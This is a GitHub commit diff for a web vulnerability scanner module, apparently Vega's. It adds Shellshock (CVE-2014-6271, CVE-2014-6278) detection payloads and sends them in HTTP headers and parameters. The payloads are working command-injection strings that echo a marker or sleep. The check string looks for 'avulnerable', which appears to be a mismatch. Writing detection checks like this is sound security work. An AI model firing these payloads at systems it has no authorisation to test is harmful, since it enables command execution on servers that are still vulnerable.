-
Notifications
You must be signed in to change notification settings - Fork 94
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
tdzmont
committed
Oct 6, 2014
1 parent
23dde89
commit 8bfbba9
Showing
2 changed files
with
134 additions
and
76 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,112 +1,169 @@ | ||
var module = { | ||
name: "Bash Environment Variable Blind OS Injection (CVE-2014-6271) Checks", | ||
category: "Injection Modules", | ||
differential: true | ||
name: "Bash Environment Variable Blind OS Injection (CVE-2014-6271, CVE-2014-6278) Checks", | ||
category: "Injection Modules", | ||
differential: true | ||
}; | ||
|
||
var alteredRequests = []; | ||
|
||
var sleepPayload = "() { :;}; /bin/sleep 31" | ||
var sleepPayload = "() { :;}; /bin/sleep 31"; | ||
var payload6271 = "() { :; }; printf 'Content-Type: text/json\\r\\n\\r\\n%s vulnerable %s' 'VEGA123' 'VEGA123'"; | ||
var payload6278 = "() { _; } >_[\$(\$())] { printf 'Content-Type: text/html\\r\\n\\r\\n%s vulnerable %s' 'VEGA123' 'VEGA123'; }"; | ||
|
||
alteredRequests.push({ | ||
payload: sleepPayload, | ||
header: "Custom" | ||
payload: payload6271, | ||
header: "EchoAttackFirst", | ||
check: "echo" | ||
}); | ||
alteredRequests.push({ | ||
payload: payload6271, | ||
header: "", | ||
check: "echo" | ||
}); | ||
alteredRequests.push({ | ||
payload: payload6271, | ||
header: "Referer", | ||
check: "echo" | ||
}); | ||
alteredRequests.push({ | ||
payload: payload6271, | ||
header: "Accept-Language", | ||
check: "echo" | ||
}); | ||
alteredRequests.push({ | ||
payload: payload6271, | ||
header: "Cookie", | ||
check: "echo" | ||
}); | ||
|
||
alteredRequests.push({ | ||
payload: sleepPayload, | ||
header: "User-Agent" | ||
payload: payload6278, | ||
header: "User-Agent", | ||
check: "echo" | ||
}); | ||
alteredRequests.push({ | ||
payload: payload6278, | ||
header: "", | ||
check: "echo" | ||
}); | ||
alteredRequests.push({ | ||
payload: payload6278, | ||
header: "Referer", | ||
check: "echo" | ||
}); | ||
alteredRequests.push({ | ||
payload: payload6278, | ||
header: "Accept-Language", | ||
check: "echo" | ||
}); | ||
alteredRequests.push({ | ||
payload: payload6278, | ||
header: "Cookie", | ||
check: "echo" | ||
}); | ||
|
||
|
||
alteredRequests.push({ | ||
payload: sleepPayload, | ||
header: "Referer" | ||
header: "", | ||
check: "timeout" | ||
}); | ||
|
||
alteredRequests.push({ | ||
payload: sleepPayload, | ||
header: "Accept-Language" | ||
header: "User-Agent", | ||
check: "timeout" | ||
}); | ||
|
||
alteredRequests.push({ | ||
payload: sleepPayload, | ||
header: "Cookie" | ||
header: "Referer", | ||
check: "timeout" | ||
}); | ||
|
||
alteredRequests.push({ | ||
payload: sleepPayload, | ||
header: "" | ||
payload: sleepPayload, | ||
header: "Accept-Language", | ||
check: "timeout" | ||
}); | ||
alteredRequests.push({ | ||
payload: sleepPayload, | ||
header: "Cookie", | ||
check: "timeout" | ||
}); | ||
|
||
function initialize(ctx) { | ||
var ps = ctx.getPathState(); | ||
var req = ps.createAlteredRequest("", true); | ||
req.addHeader("Custom", "() { :;}; /bin/sleep 31"); | ||
/*var req1 = ps.createAlteredRequest("", true); | ||
req1.addHeader("User-Agent", "() { :;}; /bin/sleep 31 "); | ||
var req2 = ps.createAlteredRequest("", true); | ||
req2.addHeader("Referer", "() { :;}; /bin/sleep 31 "); | ||
var req3 = ps.createAlteredRequest("", true); | ||
req3.addHeader("Accept-Language", "() { :;}; /bin/sleep 31 "); | ||
var req4 = ps.createAlteredRequest("", true); | ||
req4.addHeader("Cookie", "() { :;}; /bin/sleep 31 "); | ||
var req5 = ps.createAlteredRequest("() { :;}; /bin/sleep 31", false); | ||
*/ | ||
ctx.submitRequest(req, process, 0); | ||
/*ctx.submitRequest(req1, process, 1); | ||
ctx.submitRequest(req2, process, 2); | ||
ctx.submitRequest(req3, process, 3); | ||
ctx.submitRequest(req4, process, 4); | ||
ctx.submitRequest(req5, process, 5);*/ | ||
var ps = ctx.getPathState(); | ||
var req = ps.createAlteredRequest("", true); | ||
req.addHeader("User-Agent","() { :; }; printf 'Content-Type: text/json\\r\\n\\r\\n%s vulnerable %s' 'VEGA123' 'VEGA123'"); | ||
ctx.submitRequest(req, process, 0); | ||
|
||
} | ||
|
||
var checkTiming = function(ctx, currentIndex) { | ||
if (ctx.getSavedResponse(currentIndex).milliseconds > 30000) { | ||
return true; | ||
} | ||
return false; | ||
if (ctx.getSavedResponse(currentIndex).milliseconds > 30000) { | ||
return true; | ||
} | ||
return false; | ||
}; | ||
|
||
|
||
var checkOutput = function(ctx, currentIndex) { | ||
if (ctx.getSavedResponse(currentIndex).bodyAsString.indexOf("VEGA123 avulnerable VEGA123") > -1) { | ||
return true; | ||
} | ||
return false; | ||
}; | ||
|
||
function process(req, res, ctx) { | ||
if (ctx.hasModuleFailed()) return; | ||
if (res.fetchFail) { | ||
ctx.error(req, res, "During Bash Environment Variable injection checks"); | ||
ctx.setModuleFailed(); | ||
return; | ||
} | ||
var ps = ctx.getPathState(); | ||
var currentIndex = ctx.getCurrentIndex(); | ||
ctx.addRequestResponse(req, res); | ||
ctx.incrementResponseCount(); | ||
var detected = checkTiming(ctx, currentIndex); | ||
if (detected) { | ||
var uri = String(req.requestLine.uri); | ||
var uripart = uri.replace(/\?.*/, ""); | ||
if ((uripart.length > 2) && (uripart.slice(-1) == "/")) { | ||
uripart = uripart.substring(0, uripart.length-1); | ||
} | ||
if (ctx.hasModuleFailed()) return; | ||
if (res.fetchFail) { | ||
ctx.error(req, res, "During Bash Environment Variable injection checks"); | ||
ctx.setModuleFailed(); | ||
return; | ||
} | ||
var ps = ctx.getPathState(); | ||
|
||
var currentIndex = ctx.getCurrentIndex(); | ||
ctx.addRequestResponse(req, res); | ||
ctx.incrementResponseCount(); | ||
|
||
var type=""; | ||
if (alteredRequests[currentIndex].check == "echo"){ | ||
var detected = checkOutput(ctx, currentIndex); /* check for echod output first */ | ||
type = detected ? "Executed Commands on Host" : ""; | ||
} | ||
else{ | ||
detected = checkTiming(ctx, currentIndex); /* check for timing attack */ | ||
type = detected ? "Blind Timing Analysis Checks" : ""; | ||
} | ||
if (detected){ | ||
var uri = String(req.requestLine.uri); | ||
var uripart = uri.replace(/\?.*/, ""); | ||
if ((uripart.length > 2) && (uripart.slice(-1) == "/")) { | ||
uripart = uripart.substring(0, uripart.length-1); | ||
} | ||
|
||
ctx.alert("vinfo-bash-inject", ctx.getSavedRequest(currentIndex), ctx.getSavedResponse(currentIndex), { | ||
output: res.bodyAsString, | ||
key: "vinfo-shell-inject:" + uripart + ":" + ps.getFuzzableParameter().name, | ||
resource: uripart, | ||
detectiontype: 'Blind Timing Analysis Checks', | ||
param: ps.getFuzzableParameter().name | ||
}); | ||
} else { | ||
if (currentIndex + 1 < alteredRequests.length) { | ||
if (alteredRequests[currentIndex + 1].header == "") { | ||
req = ps.createAlteredRequest(alteredRequests[currentIndex + 1].payload, false); | ||
} else { | ||
req = ps.createAlteredRequest("", true); | ||
req.addHeader(alteredRequests[currentIndex + 1].header, alteredRequests[currentIndex + 1].payload); | ||
} | ||
ctx.submitAlteredRequest(process, req, currentIndex + 1); | ||
ctx.alert("vinfo-bash-inject", ctx.getSavedRequest(currentIndex), ctx.getSavedResponse(currentIndex), { | ||
output: res.bodyAsString, | ||
key: "vinfo-shell-inject:" + uripart + ":" + ps.getFuzzableParameter().name, | ||
resource: uripart, | ||
detectiontype: type, | ||
param: ps.getFuzzableParameter().name | ||
}); | ||
} else { | ||
if (currentIndex + 1 < alteredRequests.length) { | ||
if (alteredRequests[currentIndex + 1].header == "") { | ||
req = ps.createRequest(); | ||
req = ps.createAlteredRequest(alteredRequests[currentIndex + 1].payload, false); | ||
} else { | ||
req = ps.createRequest(); | ||
req.addHeader(alteredRequests[currentIndex + 1].header, alteredRequests[currentIndex + 1].payload); | ||
} | ||
ctx.submitRequest(req, process, currentIndex + 1); | ||
var submitted=currentIndex+1; | ||
} | ||
} | ||
if (ctx.allResponsesReceived()) { | ||
} | ||
if (ctx.allResponsesReceived()) { | ||
ps.decrementFuzzCounter(); | ||
} | ||
} | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters